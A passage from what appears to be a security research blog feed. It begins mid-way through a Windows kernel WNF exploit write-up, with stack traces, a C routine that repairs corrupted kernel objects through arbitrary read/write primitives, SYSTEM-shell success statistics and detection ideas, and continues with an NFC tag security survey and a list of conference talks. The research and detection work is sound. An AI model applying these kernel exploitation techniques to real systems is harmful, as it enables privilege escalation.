09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see there is a member TemporaryNamesListHead which is a linked list of the addresses of the TemporaryNamesListHead within the _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I had the need to obtain NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, then the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14

Exploit Testing and Statistics

As there are some elements of instability and non-deterministic elements of this exploit, then an exploit testing framework was developed to determine the effectiveness across multiple runs and on multiple different supported platforms and by varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third party drivers etc installed and a more noisy kernel pool, it gives some indication of this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned by groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 85 82 76 75 75 78
Total LFH writes 708 726 707 678 624 688
Avg LFH writes 8 8 9 9 8 8
Failed after 32 1 3 2 1 1 2
BSODs on exec 14 15 22 24 24 20
Unmapped Read 4 5 8 6 10 7

Spray size 6000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 80 78 84 79 81
Total LFH writes 674 643 696 762 706 696
Avg LFH writes 8 8 9 9 8 8
Failed after 32 2 4 3 3 4 3
BSODs on exec 14 16 19 13 17 16
Unmapped Read 2 4 4 5 4 4

Spray size 10000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 85 87 85 86 85
Total LFH writes 805 714 761 688 694 732
Avg LFG writes 9 8 8 8 8 8
Failed after 32 3 5 3 3 3 3
BSODs on exec 13 10 10 12 11 11
Unmapped Read 1 0 1 1 0 1

Spray size 20000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 89 90 94 90 90 91
Total LFH writes 624 763 657 762 650 691
Avg LFG writes 7 8 7 8 7 7
Failed after 32 3 2 1 2 2 2
BSODs on exec 8 8 5 8 8 7
Unmapped Read 0 0 0 0 1 0

From this was can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reducing the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that performing the token stealing method there are more kernel reads/writes and a longer time duration between reverting PreviousMode.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
PRIV shells 94 92 93 92 89 92
Total LFH writes 939 825 825 788 724 820
Avg LFG writes 9 8 8 8 8 8
Failed after 32 2 2 1 2 0 1
BSODs on exec 4 6 6 6 11 6
Unmapped Read 0 1 1 2 2 1

Therefore, there is only negligible difference these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well firstly there is a patch out for this vulnerability since the 8th of June 2021. If your reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this and in general detecting memory corruption exploits within the wild. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc) which have been covered in many online articles. As I never had access to the in the wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited a low integrity (and thus from a sandbox), then the detection mechanisms would vary based on if an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome while loading a new tab and web page did not trigger either of the events too. I didn’t explore too deeply if there were any render operations which could trigger this non-maliciously but provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur which could act a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution. Once kernel code execution has been gained or SYSTEM, they may just disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more succesful and less likely to cause instability on the target system than a simple POC. However, we can only get about 90%~ success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

The ABCs of NFC chip security

30 August 2021 at 23:00

tl;dr

NFC tags are becoming increasingly more common in everyday use cases such as: 

  • Public spaces like museums, art galleries or even retail stores in order to provide additional information about an item or product. 
  • Inventory management sites use NFC tags on product packaging to update information on its contents. 
  • Industrial facilities can use NFC for sharing initial secrets needed for device or service provisioning scenarios and also to deploy configuration data in operational mode (e.g. Amazon Monitron). 
  • Numerous other use cases such as factory and home automation, industrial and street lighting, security systems, metering, healthcare, and wellness. Some real-life examples are the IRISS E Sentry Connect used to track electrical equipment inspection and maintenance history, McLear RingPay used for contactless payments, or the Oura ring used for healthcare and wellness tracking. 

When looking into guidance on securely configuring NFC tags, a well-documented resource detailing how to securely configure a specific NFC tag chip was not readily available. The only available solution was to search every manufacturer’s datasheet and documentation in order to identify the security-related information. NCC Group aims to solve this documentation deficiency in this blog post by presenting an overview of security features that are available in the most common NFC tag models on the market, and to provide a side-by-side comparison. 

NFC Tag Standards and Specifications

The NFC technology stack is rather complex, as there are several available standards and specifications that define NFC tag feature support. Generally, security features in NFC chips will correlate to commands that are supported by each chip.  

The following table maps the features provided by each standard to the NFC protocol stack, which illustrates the complexity of the NFC ecosystem.  

https://en.wikipedia.org/wiki/Near-field_communication#/media/File:NFC_Protocol_Stack.png

The complexity of the NFC ecosystem is illustrated by the previous chart. Perhaps the most surprising thing about the diagram above is not even that different standards exist at different layers of the NFC stack, but that even at a given layer of the stack, there are multiple competing standards which often fail to align. This complex ecosystem has resulted in inconsistencies in users’ security expectations – and security engineering methodologies – when deploying NFC.  
 
For example, above, the ISO International standards are mainly involved in defining the specifications at the physical and RF layers, but as we go up in the protocol stack, we encounter the different manufacturer contributions. For example, the ST25TA64K chip supports three command families:  

  • The NFC Forum Type 4 Tag command set 
  • The ISO/IEC 7816-4 command set 
  • The ST proprietary command set 

Further illustrating the degree of complexity, in order to enable the Read Only permanent state for an NDEF file in this same ST chip, commands from all three supported families are required. The following RF commands need to be used, in this precise order: 

  1. NDEF Tag Application Select (NFC Forum Type 4 Tag command set) 
  1. NDEF select File: Selects the NDEF file (NFC Forum Type 4 Tag command set) 
  1. Verify command: Checks the right access of a NDEF file or sends a password (ISO/IEC 7816-4 command set) 
  1. NDEF select File: Selects the NDEF file (NFC Forum Type 4 Tag command set) 
  1. EnablePermanentState command: Enables the Read Only or Write Only security state(ST proprietary command set) 

From this we can see that it is clear that there are several standards defining the NFC protocol stack, and so any tool looking to provide support for configuring NFC tag security features will need to support more than one standard. This is one of the primary reasons why tooling support and security best practice documentation in the NFC ecosystem is woefully lacking. 

Available Security Options

To illustrate an important concept within NFC security – namely, that of “user” and “system” specific memory protections, we share an example in the following image which describes the block architecture of the ST25TA64K tag from NXP. Note below the presence of both User and System memory areas, which exist within different regions of a 64-Kbit EEPROM internal to the NFC chip. 

The NFC specification defines important security features for these two memory areas. For each chip surveyed, two main types of security features were observed:  

  • User memory protection: User memory is where customer data, such as NDEF records (https://w3c.github.io/web-nfc/#dfn-ndef-record), would be stored. The NFC Data Exchange Format (NDEF) is a data format that can be used to exchange information (NDEF records) between any compatible NFC device and another NFC device or tag.  
  • System configuration protection: This is where system configuration data would be stored, such as the passwords used for user memory area protection.  

User memory and system configuration are generally stored in different memory areas within the NFC chip, and are accessed via different commands. For both user memory and system configuration protection, the following configuration parameters are available: 

  • Read Protection (RDP): Protection via a password for read operations. 
  • Write Protection (WDP): Protection via a password for write operations. 
  • Permanent Lock: Prevent the contents from modifications (Write operations). 

The implementation of these protections, as well as additional protections some chips might offer are compiled in the following section. 

Comparison

A selection of NFC tags surveyed during this research

The tags used for this comparison were chosen by public availability and features offered and are listed hereafter. The astute reader will notice some duplication below, and that is due to the fact that some vendors sell NFC tags that use another vendor’s NFC chip. 

  • STMicroelectronics ST25TA02K 
  • STMicroelectronics ST25TA64K 
  • STMicroelectronics ST25DV Series 
  • Adafruit 4032 (NXP NTAG213) 
  • Adafruit 4033 (NXP NTAG213) 
  • Adafruit 4034 (NXP NTAG213) 
  • DFRobot FIT0313 (NXP NXPS50) 
  • Murata Electronics LXMS33HCNG-134 (NXP ICODE SLIX) 
  • Avery Dennison RFID 600560 (NXP UCODE 7) 
  • Avery Dennison RFID 600600 (Impinj Monza R6) 
  • SparkFun Electronics WRL-14151 (EPCglobal Gen2) 
  • Abracon LLC ART915X250903AM-IC (Alien H3 RFID) 

Understanding the security impact of NFC chips’ range & frequency

NFC solutions have evolved with time to support higher RF frequencies, and as a consequence they can be interacted with from longer distances, including by attackers. The advertised ranges for UHF chips are close to early Bluetooth ranges and would no longer even require an attacker to physically tap the tag. Additionally, the advertised applications have been expanding more and more and entering safety critical areas, such as within the , oil and gas industry, as well as military devices and vehicles. It is thus important to know how to choose the appropriate chips for a given use case, and how to configure them securely. 

Understanding the security impact of NFC chips’ memory protections

For a strong security posture, it is important for the chosen chip to support as many protections as possible. Having these protections enabled by default even with easily guessable passwords may protect the contents of the chip from some opportunistic threat actors, improving the security stance. However, this will not provide any protection against any sort of more persistent or even mildly sophisticated attack. It is thus important to include enabling the security protections and configuring secure passwords in the NFC chip configuration process before they are deployed in the wild. Depending on the chip and management needs, it can be permanently locked to prevent write actions from RF, if there is a secondary channel to perform this action, such as I2C (e.g. ST25DV) or if the contents are never expected to change. 

In the following table we enumerate all of the surveyed NFC chips and whether read (RDP) and write (WDP) user memory protections are available, as well as the default chip configuration was to enable or disable RDP and WDP, and whether the chips support Permanent Lock functionality. Although some chips had detailed publicly available documentation, for other chips the data sheets and reference manuals were only available under NDA. All chips have public documentation of their security features, except for Alien H3, which required an NDA and the NXPS50 and Sparkfun EPCglobal, which list the security features but don’t document their default configuration. For those chips whose documentation was locked behind an NDA, we have filled in their corresponding values as “Unknown”. Only publicly available information has been used in this post, no information requiring an NDA. 

Chip  RDP/ Default  WDP/ Default  RDP Default PWD  WDP Default PWD  Perm. Lock/ Default 
ST25TA02K  Y / N  Y / N  0x00 (128-bit)  0x00 (128-bit)  Y / N 
ST25TA64K  Y / N  Y / N  0x00 (128-bit)  0x00 (128-bit)  Y / N 
ST25DV Series  Y / N  Y / N  0x00 (64-bit)  0x00 (64-bit)  Y / N1 
NXP NTAG213  Y / N  Y / N  PWD: 0xFF (32-bit)  PWD: 0xFF (32-bit)  Y / N 2 3  
NXPS50  Y / Unknown  Y /  Unknown   Unknown    Unknown    Unknown  
NXP ICODE SLIX  Y / N  0x00 (32-bit)  Y / N 
NXP UCODE 74  Y / Y  Y / Y  0x00 (32-bit) 5  0x00 (32-bit) 5  Y / N 
Impinj Monza R64 6  0x00 (32-bit)  0x00 (32-bit)  Y / N 
EPCglobal Gen2  Y /  Unknown  Y /  Unknown   Unknown    Unknown    Unknown  
Alien H3 RFID  Y / Unknown   Y / Unknown    Unknown    Unknown  Y / Unknown  
User memory protection and default values 

The following table documents whether read (RDP) and write (WDP) system configuration protection is available for each of the reviewed chips, as well as the default configuration and whether they support Permanent Lock capabilities. 

Chip  RDP/ Default  WDP/ Default  RDP Default PWD  WDP Default PWD  Perm. Lock/ Default 
ST25TA02K  N / N  N / N  Not Applicable  Not Applicable  Partial/N 11 
ST25TA64K  N / N  N / N  Not Applicable  Not Applicable  Partial/N 11 
ST25DV Series  Y / N  Y / N  0x00 (64-bit)  0x00 (64-bit)  Y / N1 
NXP NTAG213  Y / N  Y / N  PWD: 0xFF (32-bit)  PWD: 0xFF (32-bit)  Partial / N 2 3 7 
NXPS50  Y / Unknown   Y / Unknown   Unknown   Unknown   Unknown  
NXP ICODE SLIX  Y / N8  0x00 (32-bit)  Partial / N9 
NXP UCODE 710  Y / N  Y / N  0x00 (32-bit) 5  0x00 (32-bit) 5  Y / N 
Impinj Monza R66  0x00 (32-bit)  0x00 (32-bit)  Y / N 
EPCglobal Gen2  Y / Unknown  Y / Unknown   Unknown   Unknown   Unknown  
Alien H3 RFID10  Y / Unknown   Y / Unknown   Unknown   Unknown   Y / Unknown  
System configuration protections and Default values 

Conclusion

Despite the many standards available defining NFC, in reality the support, definition and implementation of security features for NFC tags can vary quite a lot depending on the chip manufacturer as well as the tag vendor. Additionally, some tags don’t support read/write protections, and most tags are delivered to end users with an insecure default configuration, such as including default protection passwords that are easily guessable (all 0s). Moreover, many tags have no available information in their public documentation on the default configuration. 

Thus, depending on the application intended for the NFC tags, it is important to ensure that  the chip can fulfill the security expectations of the product threat model. For example, if the tags are to be installed in public areas such as libraries or supermarkets, then a manufacturing or provisioning process should be defined in order to lock down the memory contents. 

The average user will tend to trust the businesses that deploy NFC tags and will scan them in order to view content, which could expose their own mobile devices to further attacks If these tags are deployed in the default insecure configuration, a malicious actor could re-write the tag with malicious content, such as a link to a phishing website, or an NDEF record that redirects the user to install a malicious application on their phone. Some examples of attacks are: malware installation via Android Beam, or redirecting the user to install a Play Store application by writing on the tag an Android Application Record (AAR) NDEF record with a malicious application. The latter will instruct the mobile device that the malicious Android Application should be used to handle the NFC tag and open the application’s Play Store page, guiding the user to install it. Attackers could go as far as locking down the tag memory, so that the company could not restore them and would have to re-deploy new tags. This type of attack does not target a user’s mobile device security, but instead impacts the trust the user has when scanning the tag provided by the business or organization. 

Therefore the consequences of insecure deployment of NFC is not limited just to the affected users and their devices – it can also affect businesses in terms of both their reputation as perceived by their customers and suppliers, as well as their ability to reliably use NFC deployments in their ongoing operations. 

Endnotes

1 The system configuration can be permanently locked for write access from RF, but an I2C host will still be able to edit and unlock: “user cannot unlock system configuration if LOCK_CFG=01h, even after opening RF configuration security session (only I2C host can unlock system configuration).” (https://www.st.com/resource/en/datasheet/st25dv04k.pdf

2 The documentation mentions : “CFGLCK: user configuration permanently locked against write access, except PWD […]” and “The PWD  [… is] writable even if the CFGLCK bit is set to 1b.“, which means the two passwords can still be modified, despite the memory being permanently locked. (https://www.nxp.com/docs/en/data-sheet/NTAG213_215_216.pdf

3 Additional protection in the case of too many unsuccessful authentication attempts : “As soon as this internal counter reaches the number specified in AUTHLIM, any further negative password verification leads to a permanent locking of the protected part of the memory for the specified access modes.” (https://www.nxp.com/docs/en/data-sheet/NTAG213_215_216.pdf

4 The tag does not have user memory per-se, the inventory data is stored in the EPC memory section, for this comparison we consider this area as “user memory” as this would be the data returned to a user when reading the tag. 

5 If a Tag does not implement the kill and/or access password(s), the Tag shall logically operate as though it has zero-valued password(s) that are permanently read/write locked” (https://www.gs1.org/sites/default/files/docs/epc/uhfc1g2_1_2_0-standard-20080511.pdf

6 Monza R6 does not have any user programmable passwords. As per the Gen2 specifications the passwords are PermaReadLocked and set to zero. It follows that Monza R6 is not killable and does not utilize the Access command.” (https://support.impinj.com/hc/article_attachments/1500019253582/Impinj_Monza_R6_Tag_Chip_Datasheet_V7_20210521.pdf

7 The documentation suggests that only the first two configuration pages can be permanently locked: “Remark: The CFGLCK bit activates the permanent write protection of the first two configuration pages. The write lock is only activated after a power cycle of NTAG21x. If write protection is enabled, each write attempt leads to a NAK response.” (https://www.nxp.com/docs/en/data-sheet/NTAG213_215_216.pdf

8 Only for EAS and AFI functionality: “Password (32-bit) protected EAS and AFI functionality” (https://www.nxp.com/docs/en/data-sheet/SL2S2002_SL2S2102.pdf

9 Only available for specific configuration areas: “Lock mechanism for DSFID, AFI, EAS” (https://www.nxp.com/docs/en/data-sheet/SL2S2002_SL2S2102.pdf

10 An additional security feature from the EPC standard, a tag can be “killed” : “The kill password is a 32-bit value stored in Reserved memory 00h to 1Fh, MSB first. The default (unprogrammed) value shall be zero. An Interrogator may use the kill password to (1) recommission a Tag, and/or (2) kill a Tag and render it nonresponsive thereafter. A Tag shall not execute a recommissioning or kill operation if its kill password is zero. A Tag that does not implement a kill password operates as if it has a zero-valued kill password that is permanently read/write locked.” (https://www.gs1.org/sites/default/files/docs/epc/uhfc1g2_1_2_0-standard-20080511.pdf

11 Only for the GPO Config and Event Counter Config bytes (https://www.st.com/resource/en/datasheet/st25ta02k-p.pdf

Conference Talks – September 2021

31 August 2021 at 09:00

This month, members of NCC Group will be presenting their work at the following conferences:

  • Javed Samuel, “Overview of Open-Source Cryptography Vulnerabilities”, to be presented at the International Cryptographic Module Conference 2021 (Virtual – Sept 3 2021)
  • Robert Seacord, “Secure Coding”, to be presented at Auto ISAC Analysts (Virtual – Sept 7 2021)
  • Erik Steringer, “Automating AWS Privilege Escalation Risk Detection With Principal Mapper”, to be presented at fwd:CloudSec (Salt Lake City Utah Sept 13-14 2021)
  • Duane Reeves, “Telephony: The Forgotten Network Threat”, to be presented at GSX 2021 (Orlando Florida Sept 27 2021)

Please join us!

Overview of Open-Source Cryptography Vulnerabilities
Javed Samuel
ICMC21 – Bethesda, Maryland
September 3 2021

This talk will review the foundations of cryptographic vulnerabilities as applicable to open-source software from a penetration tester’s perspective over multiple public cryptography audit reports. It will discuss what attacks in the past took advantage of these cryptography vulnerabilities and what the consequences were. The talk will also examine ways that open-source software has been updated over time to mitigate these cryptography flaws and how successful these mitigations may have been. Finally, some thoughts on possible areas that could be the focus for future cryptography vulnerabilities in open-source applications will be presented. 

Secure Coding
Robert Seacord
Auto ISAC Analysts – Virtual
September 7 2021

Secure coding is essential to the development of secure, connected vehicles. Current safety guidelines such as MISRA are deficient from a security perspective. This talk will provide an overview of secure coding and some of the problems it solves that are not adequately addressed by MISRA. It will provide an explanation of common programming errors in C and C++ and describe how these errors can lead to code that is vulnerable to exploitation. It will concentrate on security issues intrinsic to the C and C++ programming languages and associated libraries.

Automating AWS Privilege Escalation Risk Detection With Principal Mapper
Erik Steringer
fwd: Cloud Sec – Salt Lake City, Utah
September 13-14 2021

You locked down your AWS account’s IAM Policies, but are you certain there aren’t any unexpected side effects? Are there any passable/assumable roles that could be abused to access those credentials you stashed in Secrets Manager? Principal Mapper (PMapper) is a tool for in-depth evaluation of AWS IAM Authorization Risks. This talk covers how to extend it to automate finding risks (continuous monitoring) and test for resource isolation.

Telephony: The Forgotten Network Threat
Duane Reeves
GSX 2021- Orlando Florida
September 27 2021

Telecommunications networks are now relied upon more than ever before, making them a staple of modern society’s critical infrastructure. Unfortunately, fraud and security threats are arising alongside the technological advancements by today’s unified communications (UC) systems. The Communications Fraud Control Association (CFCA), in its 2019 annual survey, announced that global yearly fraud losses are in the range of $28–$30 billion. What does telephony look like today, and how have UC networks made fraudulent activities easier, cheaper, and available to more people? In this session, I will address those questions, explore the various risks organizations face, and detail important steps to identify countermeasures to protect against the multiple threats.

